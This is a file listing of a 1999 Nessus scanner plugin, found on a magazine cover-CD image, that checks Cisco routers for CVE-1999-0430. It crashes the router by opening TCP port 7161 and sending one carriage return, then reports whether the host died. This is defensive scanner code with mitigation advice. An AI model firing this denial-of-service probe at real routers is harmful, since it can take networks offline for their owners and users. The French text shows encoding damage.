home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / cisco_dos.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  89 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10046);
  10.  script_bugtraq_id(705);
  11.  script_cve_id("CVE-1999-0430");
  12.  script_version ("$Revision: 1.18 $");
  13.  
  14.  name["english"] = "Cisco DoS";
  15.  name["francais"] = "DΘni de service Cisco";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "It was possible to crash
  19. the remote router using the vulnerability addressed
  20. by the software bug ID CSCdi74333, that is,
  21. by connecting this port and sending a carriage
  22. return.
  23.  
  24. An attacker may use this flaw to make your
  25. router crash continuously, thus preventing your
  26. network from working properly.
  27.  
  28. Solution : filter incoming traffic to TCP port 7161.
  29. Contact Cisco for a patch.
  30.  
  31. Risk factor : High";
  32.  
  33.  desc["francais"] = "Il a ΘtΘ possible de faire
  34. planter le routeur distant en utilisant la
  35. vulnΘrabilitΘ dΘcrite dans le bug Cisco d'identification
  36. CSCdi74333, c'est α dire en se connectant α ce port
  37. et en envoyant un caractΦre de retour chariot.
  38.  
  39. Un pirate peut utiliser ce problΦme pour faire
  40. planter votre routeur continuellement, empechant
  41. ainsi votre rΘseau de fonctionner correctement.
  42.  
  43.  
  44. Solution : filtrez le traffic entrant en direction
  45. du port 7161. Contactez Cisco pour un patch.
  46.  
  47. Facteur de risque : ElevΘ";
  48.  
  49.  
  50.  script_description(english:desc["english"], francais:desc["francais"]);
  51.  
  52.  summary["english"] = "Crashes a Cisco router";
  53.  summary["francais"] = "Fait planter un routeur Cisco";
  54.  script_summary(english:summary["english"], francais:summary["francais"]);
  55.  
  56.  script_category(ACT_KILL_HOST);
  57.  
  58.  
  59.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  60.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  61.  family["english"] = "Denial of Service";
  62.  family["francais"] = "DΘni de service";
  63.  script_family(english:family["english"], francais:family["francais"]);
  64.  script_require_ports(7161);
  65.  exit(0);
  66. }
  67.  
  68. #
  69. # The script code starts here
  70. #
  71.  
  72. if(get_port_state(7161))
  73. {
  74.  soc = open_sock_tcp(7161);
  75.  if(soc)
  76.  {
  77.   start_denial();
  78.   data = raw_string(13);
  79.   send(socket:soc, data:data);
  80.   sleep(5);
  81.   alive = end_denial();
  82.    if(!alive){
  83.           security_hole(7161);
  84.         set_kb_item(name:"Host/dead", value:TRUE);
  85.         }
  86.  }
  87. }
  88.  
  89.